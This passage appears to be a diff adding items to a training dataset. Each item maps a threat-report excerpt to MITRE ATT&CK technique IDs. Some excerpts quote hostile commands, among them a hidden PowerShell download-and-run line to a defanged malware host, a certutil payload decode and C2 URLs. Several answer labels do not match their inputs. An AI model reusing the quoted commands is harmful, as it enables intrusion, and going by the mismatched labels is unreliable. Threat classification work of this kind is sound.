names.", + "input": "The loader\u2019s main goal was to run a PowerShell command to execute shellcode", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1059: Command and Scripting Interpreter" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The lures are primarily documents of interest to Pakistani nuclear organizations and the Pakistani military as can be seen in the images below: Figure 1 Lure extracted from a67220bcf289af6a99a9760c05d197d09502c2119f62762f78523aa7cbc96ef1 Figure 2 Lure extracted from 07d5509988b1aa6f8d5203bc4b75e6d7be6acf5055831cc961a51d3e921f96bd Figure 3 Lure extracted from b8abf94017b159f8c1f0746dca24b4eeaf7e27d2ffa83ca053a87deb7560a571 Figure 4 Lure extracted from d486ed118a425d902044fb7a84267e92b49169c24051ee9de41327ee5e6ac7c2 and fd8394b2ff9cd00380dc2b5a870e15183f1dc3bd82ca6ee58f055b44074c7fd4 \u00a0 The payload from each of the malicious documents is an updated version of the BADNEWS malware family", + "output": "- T1560: Archive Collected Data\n- T1204: User Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The macro downloads a payload from hxxp://lokipanelhostingpanel[.]gq/work/kh/1.exe (SHA256: 84ed59953f57f5927b9843f35ca3c325155d5210824d3b79b060755827b51f72) by running the following command line process:cmd.exe /c powershell -W Hidden (New-Object System.NeT.WeBClieNT).DownloadFile('http://lokipanelhostingpanel[.]gq/work/kh/1.exe','%Public%\\\\\\\\svchost32.exe');Start-Process '%Public%\\\\\\\\svchost32.exeThe macro then attempts to kill Microsoft Office and Windows Defender processes using the \u2018taskkill\u2019 command", + "output": "- T1055.012: Process Injection - Process Hollowing\n- T1057: Process Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The macro saves the chkSrv.vbs script to the system, which is responsible for running the IntelSecurityAssistManager.exe payload (OopsIE Trojan) and cleaning up the installation by deleting the two scheduled tasks, the Base.txt file, the ThreeDollars document, and the chkSrv.vbs script", + "output": "- T1053.005: Scheduled Task/Job - Scheduled Task\n- T1070.004: Indicator Removal - File Deletion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The main function of the dropper All strings within the dropper, as well as the backdoor, are encrypted using a hardcoded RSA256 key", + "output": "- T1027: Obfuscated Files or Information\n- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The malicious DLL is also responsible for terminating the cliconfg.exe process and deleting the malicious NTWDBLIB.dll using: cmd /c taskkill /im cliconfg.exe /f /t && del /f /q NTWDBLIB.DLL All the following capabilities described are implemented by the malicious service DLL implant unless specified.\u00a0\u00a0 Variant using North Korean Red Cross Another variant (hash: 9e2c0bd19a77d712055ccc0276fdc062e9351436) of the malicious Word dropper uses the same Base64-decoding scheme with a different custom key", + "output": "- T1055: Process Injection\n- T1574.002: Hijack Execution Flow - DLL Side-Loading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The malware beacons to this directory using the hardcoded API token and attempts to download these files (which are deleted from the Dropbox account after the download): upload.bat, a batch script that the compromised machine will execute upload.rar, a RAR archive that contains at least two files: a batch script to execute, and often an executable (sometimes named rar.exe) \u00a0which the batch script will run and almost always uploads the results of download.rar to the cloud storage account silent.txt and period.txt, \u00a0small files sizes of 0-4 bytes that dictate the frequency to check in with the CnC The threat actor will then download the results and then delete the files from the cloud storage account", + "output": "- T1064: Scripting\n- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The malware demonstrates its evasive behavior by checking for the presence of specific processes related to antimalware products: The presence of any process with the keywords \u201cv3\u201d and \u201ccleaner.\u201d Checking for antimalware or cleaner processes", + "output": "- T1562.001: Impair Defenses - Disable or Modify Tools\n- T1057: Process Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The malware uses obfuscation in order to hide strings such as URL or User-Agent, the algorithm is based on bitwise (SUB 0x0F XOR 0x21), here is the decoded data:hxxp://old[.]jrchina[.]com/btob_asiana/udel_confirm.phpMozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/6.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; Tablet PC 2.0; .NET4.0E; InfoPath.3)The downloaded third payload is obfuscated using the same technique", + "output": "- T1087: Account Discovery\n- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The OopsIE Trojan is configured to use a C2 server hosted at:www.msoffice365cdn[.]com The Trojan will construct specific URLs to communicate with the C2 server and parses the C2 server\u2019s response looking for content within the tags
 and 
", + "output": "- T1573: Encrypted Channel\n- T1102: Web Service\n- T1008: Fallback Channels\n- T1071: Application Layer Protocol\n- T1041: Exfiltration Over C2 Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The paths discovered are: \u2022 C:\\Users\\leo\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd \u2022 C:\\Users\\poopak\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd \u2022 C:\\Users\\Vendetta\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd \u2022 C:\\Users\\Turk\\AppData\\Local\\Temp\\Word8.0\\MSForms.exd Leo, Poopak, Vendetta and Turk are the usernames of those creating the documents or the templates on which they are based", + "output": "- T1087: Account Discovery\n- T1005: Data from Local System\n- T1204: User Execution\n- T1033: System Owner/User Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The payload has a function it calls early on that tests to see which DNS query types are able to successfully reach the C2 server.\u00a0 It iterates through a list of types and the first DNS type to receive a response from the C2 server will be used for all communications between the payload and the C2 server, which are in the following order (editor\u2019s note: AC is not a\u00a0 DNS record type but is a mode where the trojan will perform a request for an A record requiring ac as a subdomain): A AAAA AC \u2013 (see note above) CNAME MX TXT SRV SOA The payload uses the built-in Windows nslookup application with specific parameters and specially crafted subdomains to communicate with the C2", + "output": "- T1071: Application Layer Protocol\n- T1008: Fallback Channels\n- T1123: Audio Capture\n- T1041: Exfiltration Over C2 Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The Payloads The delivery documents in this attack campaign loaded remote templates whose macros installed a variety of first-stage payloads", + "output": "- T1064: Scripting\n- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The payload then sets EIP to the entry point of the newly injected code using the SetThreadContext API, and finally calls the NtAlertResumeThread API function to run the injected code", + "output": "- T1106: Native API\n- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The payload will communicate with its C2 server to obtain the session ID and pre-shared key and write it to this registry key in the following format: \u00a0 _ \u00a0 To obtain the session ID and pre-shared key, the payload will first try to contact the C2 via an HTTPS GET request to the following URL: \u00a0 hxxps://www.rdppath[.]com/ \u00a0 If the above request using HTTPS does not result in an HTTP 200 OK message or the response data has no alphanumeric characters, the code will attempt to communicate with the C2 server using HTTP via the following URL: \u00a0 hxxp://www.rdppath[.]com/ \u00a0 The code to communicate with the C2 via HTTP exists within an exception handler", + "output": "- T1071: Application Layer Protocol\n- T1008: Fallback Channels" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The payload will use a specific regular expressions dependent on the type of DNS query was used to obtain the command string, which can be seen in Table 2: DNS TYPE Regex Pattern A Address:\\s+(\\d+.\\d+.\\d+.\\d+) AC \\d+-\\d+-(\\d+)-([\\w\\d+/=]+)-\\d-.ac.$Global:domain AAAA Address:\\s+(([a-fA-F0-9]{0,4}:{1,4}[\\w|:]+){1,8}) CNAME,MX,TXT,SRV,SOA (\\d+)-([\\w\\d/=+]{0,})\\-.$Global:domain Table 2 Types of responses provided by C2 These regular expressions are used to build strings that the payload will then subject to its command handler", + "output": "- T1016: System Network Configuration Discovery\n- T1071: Application Layer Protocol" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The plugin uses the same network protocol as PLAINTEE and so we were able to trivially decode further commands that were sent.\u00a0 The following commands were observed: tasklist ipconfig /all The attacker performed these two commands 33 seconds apart", + "output": "- T1059: Command and Scripting Interpreter\n- T1573: Encrypted Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"The prior example decrypts to the following: mailto:121.126.211[.]94:8080;80;80 \u00a0 The following Python script may be used to decode the C2 data used by the newest Comnie variant: 12345678910111213141516171819202122232425262728293031323334353637383940 import base64import sysimport refrom string import maketransfrom struct import *import requestsdef rc4_crypt(data, key):\u00a0\u00a0S = range(256)\u00a0\u00a0j = 0\u00a0\u00a0out = []\u00a0\u00a0for i in range(256):\u00a0\u00a0\u00a0\u00a0j = (j + S[i] + ord( key[i % len(key)] )) % 256\u00a0\u00a0\u00a0\u00a0S[i] , S[j] = S[j] , S[i]\u00a0\u00a0i = j = 0\u00a0\u00a0for char in data:\u00a0\u00a0\u00a0\u00a0i = ( i + 1 ) % 256\u00a0\u00a0\u00a0\u00a0j = ( j + S[i] ) % 256\u00a0\u00a0\u00a0\u00a0S[i] , S[j] = S[j] , S[i]\u00a0\u00a0\u00a0\u00a0out.append(chr(ord(char) ^ S[(S[j] + S[i]) % 256]))\u00a0\u00a0return ''.join(out)def decode(data):\u00a0\u00a0o = \"\"\"\"\u00a0\u00a0for d in data:\u00a0\u00a0\u00a0\u00a0od = ord(d)\u00a0\u00a0\u00a0\u00a0o += chr((4 * (16 * od | od & 0xC) | (((od >> 4 | od & 0x30) >> 2))) & 0xFF)\u00a0\u00a0return obase64fixTable = maketrans(\"\"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\"\"[::-1], \"\"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\"\");def trans(string):\u00a0\u00a0return str(string).translate(base64fixTable)def altdecode(string):\u00a0\u00a0return base64.b64decode(trans(string))req = requests.get(sys.argv[1])fd = req.textoriginal_data = re.search(\"\"magnet:/\\?([^\\?]+)\\?\"\", fd).group(1)parsed_data = altdecode(original_data)dataLength = unpack(\"\"Connection: Keep-Alive If the payload is unable to reach the C2 via HTTPS/HTTP, the payload yet again falls back to DNS tunneling", + "output": "- T1071: Application Layer Protocol\n- T1008: Fallback Channels\n- T1041: Exfiltration Over C2 Channel" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The second named scheduled task, loaded as an XML file to falsify task attributes, ran a JavaScript code block that downloaded and launched a secondary backdoor, delivered as a multi-stage PowerShell script", + "output": "- T1064: Scripting\n- T1036: Masquerading" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The SecurityAssist task is responsible for running the following command line command that uses the Certutil application to decode the base64 encoded data in Base.txt and saves the decoded data to the file %PROGRAMDATA%\\IntelSecurityAssistManager.exe:cmd.exe /c Certutil -decode %appdata%\\Base.txt %programdata%\\IntelSecurityAssistManager.exe & SchTasks /Delete /F /TN SecurityAssist The macro also creates a second scheduled task named Conhost that waits two minutes and runs a VBScript %APPDATA%\\chkSrv.vbs", + "output": "- T1036: Masquerading\n- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "These dropped files bundle functionality for both 64bit and 32bit Windows systems and are all located within one directory: C:\\Documents and Settings\\user\\Application Data\\ATI_Subsystem\\ 6761106f816313394a653db5172dc487,amdhcp32.dll,54kb \u00a0\u2190 32bit dll,CompiledOn:2014.07.02 21:13:24 d596827d48a3ff836545b3a999f2c3e3,aticaldd.dll,60kb \u00a0\u2190 64bit dll,CompiledOn:2014.07.02 21:13:26 bc626c8f11ed753f33ad1c0fe848d898,atiumdag.dll,285kb \u2190 32bit dll, Trojan.Win32.CozyDuke.a, CompiledOn:2014.07.02 21:13:26 4152e79e3dbde55dcf3fc2014700a022,6kb,racss.dat The code copies rundll32.exe from windows\\system32 to its newly created %appdata%\\ATI_Subsystem subdirectory as \u201camdocl_as32.exe\u201d alongside the three dll\u2019s listed above", + "output": "- T1055: Process Injection\n- T1218.011: System Binary Proxy Execution - Rundll32\n- T1574.002: Hijack Execution Flow - DLL Side-Loading\n- T1574.001: Hijack Execution Flow - DLL Search Order Hijacking" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The series of commands, as seen in Table 2, include checks for virtualized environments, low memory, and processor counts, in addition to checks for common analysis tools running on the system", + "output": "- T1518.001: Software Discovery - Security Software Discovery\n- T1497: Virtualization/Sandbox Evasion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The server-side component provides a simple graphical user interface for threat actors interacting with web shells", + "output": "- T1059: Command and Scripting Interpreter\n- T1505.003: Server Software Component - Web Shell" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "These vulnerabilities include:CVE-2015-6585: Hangul Word Processor VulnerabilityCVE-2015-8651: Adobe Flash Player 18.0.0.324 and 19.x VulnerabilityCVE-2016-0034: Microsoft Silverlight 5.1.41212.0 VulnerabilityCVE-2016-1019: Adobe Flash Player 21.0.0.197 VulnerabilityCVE-2016-4117: Adobe Flash Player 21.0.0.226 VulnerabilityDHS recommends that organizations upgrade these applications to the latest version and patch level", + "output": "- T1203: Exploitation for Client Execution\n- T1068: Exploitation for Privilege Escalation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The SHA256 hash is then base64 encoded, which results in an encoded string of EfZrVfPSQwNiHl75VlsCpXbMWLxfh4nK6Ww9QABkuQ4=, of which the first 24 characters are used as the 3DES key", + "output": "- T1132: Data Encoding\n- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The shellcode executed by this PowerShell is the exact same as in the delivery documents, using code from Metasploit which can obtain additional shellcode to execute using an HTTP request to the following URL: http://www7.chrome-up[.]date/0m5EE We were not able to retrieve the shellcode hosted at this URL", + "output": "- T1059.001: Command and Scripting Interpreter - PowerShell\n- T1071: Application Layer Protocol\n- T1064: Scripting" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"The source code only considers the following machine types:default: lpString = \"\"(Other)\"\"; break;case 0x02: lpString = \"\"(Unknown)\"\"; break;case 0x03: lpString = \"\"(Desktop)\"\"; break;case 0x04: lpString = \"\"(Low Profile Desktop)\"\"; break;case 0x06: lpString = \"\"(Mini Tower)\"\"; break;case 0x07: lpString = \"\"(Tower)\"\"; break;case 0x08: lpString = \"\"(Portable)\"\"; break;case 0x09: lpString = \"\"(Laptop)\"\"; break;case 0x0A: lpString = \"\"(Notebook)\"\"; break;case 0x0E: lpString = \"\"(Sub Notebook)\"\"; break;The string format - with the () - and the considering types are exactly the same as those used in the ROKRAT samples.It's interesting to note that this reconnaissance phase was not included in the ROKRAT variant used during the \"\"Golden Time\"\" campaign.Brower StealerFor the first time, the ROKRAT sample used during the \"\"North Korean Human Rights\"\" contained a browser credentials stealer\"", + "output": "- T1008: Fallback Channels\n- T1124: System Time Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The started command will send the following information to the C&C: device_model: the model identifier (e.g.: MacBookPro9,2) bot_version: version of Keydnap build_name: the \u201cbuild name\u201d that was given by downloader os_version: OS X or macOS kernel version ip_address: external IP address as reported by ipify.org has_root: 1 if executed as root, 0 otherwise Backdoor commands The response to get_task contains an integer to identify the type of command and optional arguments", + "output": "- T1016: System Network Configuration Discovery\n- T1082: System Information Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The string \u201cfjzmpcjvqp\u201d is unique and not something likely to be present if the code was not generated with the same public POC exploit code", + "output": "- T1027.001: Obfuscated Files or Information - Binary Padding\n- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The switch statement checks for 19 cases, between 101 and 119.\u00a0(Updated to correct command IDs, thanks @mykill!) Command ID Function \u00a0Description 101 getInfoOSX Gathers username and OSX version and responds using the encrypted form of the following string: \u201cMac OS X \u2013 [OSX version] x64
\\nUser name \u2013 [username]\u201d 102 getProcessList Runs \u201cps aux\u201d to obtain a list of running processes 103 remoteShell Runs supplied command using \u201c/bin/sh\u201d 104 getInstalledAPP Gets a list of installed applications by running the command \u201cls -la /Applications\u201d 105 showBackupIosFolder Checks to see if an IOS device was backed up to the system by running the command \u201cls -la ~/Library/Application\\ Support/MobileSync/Backup/\u201d 106 downloadFileFromPath Uploads a file from a specified path 107 createFileInSystem Downloads a file, specifically provided within the C2 server\u2019s HTTP response 108 execFile Executes a specified file on the system using the NSTask:launch method 109 deletFileFromPath Deletes a specified file using the NSFileManager:removeFileAtPath method 110 takeScreenShot Takes a screenshot using the CGGetActiveDisplayList, CGDisplayCreateImage, NSImage:initWithCGImage methods", + "output": "- T1071: Application Layer Protocol\n- T1070.006: Indicator Removal - Timestomp\n- T1106: Native API" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The threat actor\u2019s main objective for using this RAT (known as Razy/NeD worm/Wonder Botnet) was obvious from the victim data that was collected \u2013 it was to search for specific file extensions such as PDF, DOC, DOCX, XLS, and XLSX, where they are compressed in RAR files per category, stored in temp directories within a folder named by victim ID (bot ID \u2013 long MD5 string), encrypted and uploaded to the C2", + "output": "- T1005: Data from Local System\n- T1074: Data Staged\n- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The tool runs the following list of WMI queries: wmic logicaldisk get Caption, Description,VolumeSerialNumber,Size,FreeSpace wmic diskdrive get Model, SerialNumber wmic computersystem get Manufacturer, Model, Name, SystemTypec wmic os get Caption, OSArchitecture, OSLanguage,SystemDrive,MUILanguages wmic process get Caption,ExecutablePath The URL used to send the system information, running processes and a screenshot to the C2 server is: hxxp://145.249.105[.]165/resource-store/stockroom-center-service/check.php?fm=[serial number] The C# variant of Zebrocy uses an HTTP POST request to the URL above to transmit the gathered data, of which is included within the HTTP POST data that is 